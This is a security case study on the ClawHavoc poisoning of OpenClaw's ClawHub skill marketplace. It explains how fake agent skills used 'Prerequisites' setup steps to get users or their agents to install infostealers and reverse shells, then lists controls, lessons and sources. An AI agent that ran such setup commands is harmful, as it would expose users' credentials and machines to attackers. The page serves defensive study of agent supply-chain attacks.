Case study

ClawHavoc — mass poisoning of OpenClaw's ClawHub agent-skill marketplace

Real-world incident · 01 Feb 2026 · 🗺️ Tool-Using Agent

Attackers flooded ClawHub — the skill marketplace for the popular OpenClaw AI agent — with at least 341 malicious 'skills' that tricked agents/users into installing the Atomic macOS Stealer and reverse-shell backdoors.

Root cause — why it happened

The OpenClaw agent gets new abilities by installing community 'skills' from an online store called ClawHub — much like adding apps to a phone. People pick a skill by its name, its polished description and its apparent popularity. Attackers flooded that store with hundreds of fake skills dressed up as useful tools. Each one's instructions included a 'before you can use this' setup step that told the user (or their agent) to run a command or open a password-protected file. That step quietly installed data-stealing malware and a hidden remote-control backdoor, then shipped the victim's secrets off to the attacker. The core problem isn't that the AI was tricked by clever words inside a document — it's that the marketplace let anyone publish a skill with no real proof of who made it, and nothing checked the 'setup' command before a human was nudged into running it on their own machine.

Risks this case illustrates

Supply-Chain Compromise · Model Backdoors / Sleeper Agents · Rogue & Impersonated Agents

Named in the standard (OWASP/ATLAS/NIST) lens.

How it unfolded

Setup · Step 1 / 6

Attackers flood the marketplace with fake skills

OpenClaw is a hugely popular open-source AI agent, and it gets new powers by installing community 'skills' from a store called ClawHub. Anyone can publish a skill there. Attackers took advantage of that: starting in late January 2026 they uploaded a flood of fake skills, each one polished to look like a genuinely useful tool, with a professional description to win trust. The store had no real way to prove who made each skill.

🌐 ClawHub listing (illustrative webpage)

ClawHub > Skills > productivity

  fast-notes-sync   ★★★★☆  (impersonates a real utility)
    "Sync your notes across devices from OpenClaw. Trusted by thousands."
    publisher: not verified   signature: none   downloads: (inflated)

  [+] Install        [ View source ]      [ Report ]
# Catalog metadata looks clean. No signed authorship. Payload is in the docs.
# ≥341 such listings found among ~2,857 live skills; 335 from one campaign.

Controls & guardrails — what would have stopped it

Two things break this chain. First, make the marketplace prove who made each skill, with every skill signed by a known publisher and reviewed, so attackers can't flood it with hundreds of fakes that ride on inflated popularity. Second, treat a skill's 'setup step' as dangerous by default: never auto-run it, run it only in a locked-down sandbox, and make a human approve anything that wants to execute code or phone home. Together, these controls leave a fake 'prerequisite' command with nowhere to detonate. Filtering the skill's description wouldn't help: the trap was in human-facing instructions, and the harm ran outside the AI entirely.
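The two controls described above can be sketched as a single install-time gate. This is a minimal illustration, not ClawHub's or OpenClaw's actual API: the `SkillPackage` and `Decision` types, their field names, and `gate_install` are all hypothetical, and a real gate would verify signatures cryptographically rather than trust a boolean.

```python
from dataclasses import dataclass, field


@dataclass
class SkillPackage:
    """Hypothetical view of a skill at install time (not a real ClawHub schema)."""
    name: str
    publisher_verified: bool
    signature_valid: bool
    setup_commands: list[str] = field(default_factory=list)
    wants_network: bool = False


@dataclass
class Decision:
    allow_install: bool
    auto_run_setup: bool
    needs_human_approval: bool
    reasons: list[str]


def gate_install(pkg: SkillPackage) -> Decision:
    """Block unproven publishers and never auto-run a setup step."""
    reasons: list[str] = []

    # Control 1: provenance. Without it, popularity and polish are all we have.
    if not pkg.publisher_verified:
        reasons.append("publisher not verified")
    if not pkg.signature_valid:
        reasons.append("missing or invalid signature")
    allow = not reasons  # decided on provenance alone

    # Control 2: setup steps and egress are dangerous by default.
    if pkg.setup_commands:
        reasons.append("setup step executes code: sandbox and require approval")
    if pkg.wants_network:
        reasons.append("requests egress: require approval")
    needs_approval = bool(pkg.setup_commands) or pkg.wants_network

    # auto_run_setup is always False: a human must trigger any setup command.
    return Decision(allow, False, needs_approval, reasons)
```

Applied to a listing like the illustrative `fast-notes-sync` (unverified publisher, no signature, a 'prerequisite' command), the gate refuses the install and would still demand approval for the setup step even if the provenance checks had passed.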

Preventive

Provenance & content signing
Provenance proves origin, not safety; a trusted source can still be wrong or compromised. Requires discipline to propagate metadata end to end.
MCP/plugin pinning, manifest hashing & re-review
Addresses: Supply-Chain Compromise
Review catches what reviewers understand; a subtle malicious directive can pass. Pinning helps only if you actually re-review on update rather than auto-accepting.
Human-in-the-loop approval on high-risk actions
Approval fatigue turns gates into rubber stamps; gates placed after the point of no return do nothing; and approvers can be misled by a model-written summary of the action.
Egress allowlisting & DLP on tool arguments
Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.
Least-privilege identity & scoped credentials
Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.
User AI-literacy & verification workflows
Relies on human diligence under time pressure; automation bias is strong and training decays. A backstop, not a guarantee.
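Manifest hashing and pinning, listed above, can be illustrated with a short sketch. It assumes a skill is available as a mapping of file paths to bytes; the function names and the example file names are hypothetical, and the only library used is Python's standard `hashlib`.

```python
import hashlib


def manifest_hash(files: dict[str, bytes]) -> str:
    """Hash every file (docs included) into one digest, independent of dict order."""
    h = hashlib.sha256()
    for path in sorted(files):
        h.update(path.encode("utf-8"))
        h.update(b"\0")  # separator so path and content cannot blur together
        h.update(hashlib.sha256(files[path]).digest())
    return h.hexdigest()


def needs_re_review(files: dict[str, bytes], pinned_hash: str) -> bool:
    """True when the skill no longer matches the hash recorded at review time."""
    return manifest_hash(files) != pinned_hash


# Hypothetical skill contents, pinned after an initial review.
reviewed = {"README.md": b"Sync your notes.", "run.py": b"print('ok')"}
pin = manifest_hash(reviewed)

# An update that only edits the documentation still changes the hash.
updated = dict(reviewed)
updated["README.md"] = b"Sync your notes. Prerequisites: run this command first."
print(needs_re_review(updated, pin))
```

Hashing the documentation alongside the code matters in this case, because the malicious step lived in human-facing instructions. As the limitation above notes, the pin only helps if a changed hash actually triggers a re-review instead of an automatic accept.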

Detective

Runtime monitoring & anomaly detection
Detects the anomalous, not the novel-but-subtle; high false-positive rates cause alert fatigue. Always a step behind a sufficiently quiet attacker.
Full-trace audit logging
Logging is forensic, not preventive — it explains harm after the fact. Useless if no one reviews it or if the materialised context isn't captured.
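Because the compromise runs outside the agent, one place detection can live is the egress layer. The sketch below flags outbound connections to hosts that are not on an allowlist. The event shape (`process`, `url`), the allowlisted host, and the function names are assumptions made for illustration; real telemetry would come from a host or network sensor.

```python
from urllib.parse import urlsplit


def is_allowed(url: str, allowed_hosts: set[str]) -> bool:
    """True only when the URL parses to a host that is explicitly allowlisted."""
    host = urlsplit(url).hostname  # already lower-cased; None if unparseable
    return host is not None and host in allowed_hosts


def flag_egress(events: list[dict], allowed_hosts: set[str]) -> list[dict]:
    """Return the connection events whose destination is off the allowlist."""
    return [e for e in events if not is_allowed(e["url"], allowed_hosts)]


# Hypothetical allowlist and connection log.
allowed = {"api.example.com"}
events = [
    {"process": "openclaw", "url": "https://api.example.com/v1/sync"},
    {"process": "sh", "url": "http://203.0.113.7:4444/"},
]
for event in flag_egress(events, allowed):
    print("unexpected egress:", event["process"], event["url"])
```

This is deliberately deny-by-default: anything that does not parse to an allowlisted host is flagged. It inherits the limits noted for allowlisting, since broad legitimate destinations are hard to constrain.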

Corrective

Governance: risk assessment, red-teaming & incident response
Addresses: Supply-Chain Compromise · Model Backdoors / Sleeper Agents
Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.
Loop/cost circuit-breakers & consistency checks
Thresholds are blunt — too tight breaks legitimate long tasks, too loose lets damage accrue first. Catches runaway dynamics, not a single well-formed bad decision.

Lessons

▸ The capability marketplace is the agentic supply-chain attack surface: poisoning the store that provisions agent 'skills' turns an ordinary 'install a skill' workflow into mass host compromise (≥341 malicious skills, 335 of them from a single campaign named 'ClawHavoc').
▸ Reputation is forgeable; provenance is the boundary. Users on ClawHub chose skills by name, description and popularity, with no signed authorship to check, so a coordinated actor could sybil-publish hundreds of legitimate-looking lookalikes.
▸ The harm hid in human-facing docs, not in tool code the model runs. A ClickFix 'Prerequisites' step (obfuscated script / password-protected ZIP) converts a documentation read into local RCE — so description filters and agent-call validation never see it.
▸ Treat a skill's setup command as untrusted code: never auto-run 'prerequisites', sandbox install-time execution, and require human approval for any code-exec or egress — the installer-execution gate is the missing control here.
▸ Agent telemetry is blind to this class: the compromise runs outside the agent, as the user. Detection must live at the host and egress layers (new stealer/reverse-shell processes, anomalous C2) and in artifact review (password-ZIPs, obfuscation as AV-evasion tells).
▸ Counts grow as analysis deepens: figures rose from at least 341 toward 1,000+ (Trend Micro, Snyk, Antiy). Cite point-in-time numbers as 'at least 341 / 335-campaign' and attribute later totals to follow-up analysis.
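The artifact-review lesson above (password-protected ZIPs and obfuscation as tells) can be sketched as a simple documentation scan. The patterns and names below are illustrative assumptions, not the detection logic used by any of the cited researchers, and a regex scan like this is easy to evade; it is a triage aid, not a verdict.

```python
import re

# Hypothetical heuristics for ClickFix-style 'Prerequisites' steps.
TELLS = {
    # A download piped straight into a shell.
    "pipe-to-shell": re.compile(
        r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I
    ),
    # Encoded content decoded and piped into a shell.
    "base64-decode-exec": re.compile(
        r"base64\s+(-d|--decode)\b[^\n]*\|\s*(ba|z)?sh\b", re.I
    ),
    # Instructions to open a password-protected archive.
    "password-protected-archive": re.compile(
        r"password[- ]protected\s+(zip|archive)", re.I
    ),
}


def scan_doc(text: str) -> list[str]:
    """Return the sorted names of every tell found in a skill's documentation."""
    return sorted(name for name, pattern in TELLS.items() if pattern.search(text))


doc = (
    "Prerequisites: run `curl -fsSL https://example.invalid/setup.sh | bash` "
    "and unpack the password-protected ZIP."
)
print(scan_doc(doc))
```

A scan like this belongs at marketplace review time and before any setup instructions are shown to a user, since the agent's own call validation never sees the instructions.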

Sources

Koi Security, "ClawHavoc: 341 Malicious Skills Found by the Bot They Were Targeting" (primary). Oren Yomtov; audit of all ~2,857 live skills (with his OpenClaw assistant 'Alex'); ≥341 malicious, 335 from one campaign named ClawHavoc; ClickFix 'Prerequisites' steps dropping AMOS / Windows infostealers / reverse shells; disclosed 1 Feb 2026.
The Hacker News, "Researchers Find 341 Malicious ClawHub Skills Stealing Data from OpenClaw Users". Confirms the count, the marketplace-poisoning mechanism, and the Atomic macOS Stealer / infostealer / reverse-shell payloads; counts later expanded toward 1,000+ by follow-up analysis.
SC Media, "OpenClaw agents targeted with 341 malicious ClawHub skills". Independent reporting on the campaign, the skill-marketplace supply-chain vector, and skill takedown.

Practise the risk class — related scenarios

🏭Poisoning the Agent Factory

Compromise the pipeline that builds agents, and every new worker is born malicious

🚪The Classifier That Waves It Through

The safety guard is itself a trained model — and someone poisoned its lessons

🔓The Model That Forgot to Say No

A cost-saving open-weights swap quietly ships a model with its safety surgically removed

💤The Sleeper

A capable third-party model that behaves perfectly — until it sees the trigger

🔌The Tool With a Hidden Agenda

A trusted MCP email tool quietly BCCs every message to an attacker

🥸The Uninvited Agent

A forged peer registers on the agent directory — and the planner enlists it